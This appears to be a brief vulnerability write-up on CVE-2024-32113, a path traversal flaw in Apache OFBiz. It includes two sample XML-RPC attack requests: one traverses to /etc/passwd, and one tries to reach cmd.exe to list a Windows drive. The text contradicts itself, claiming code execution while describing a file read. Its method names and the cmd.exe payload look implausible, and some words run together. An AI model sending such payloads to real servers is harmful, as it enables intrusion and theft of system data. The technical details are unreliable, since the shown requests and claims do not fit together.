A vulnerability classified as critical, has been found in Apache OFBiz up to 18.12.12. Affected by this issue is an unknown functionality. The manipulation with an unknown input leads to a path traversal vulnerability. The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Impacted is confidentiality, integrity, and availability.
- The CVE-2024-32113 vulnerability allows for arbitrary code execution on an Apache OFBiz server by sending a specially crafted HTTP request.
- In this request, the attacker uses the parameter
../../../../../../etc/passwdto point to theetc/passwdfile on the Apache OFBiz server. - When the Apache OFBiz server processes this request, it will attempt to read the
etc/passwdfile, which contains sensitive information about the users on the server. - This information can be used to carry out further attacks on the server, such as stealing data, modifying it, or even deleting it.
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>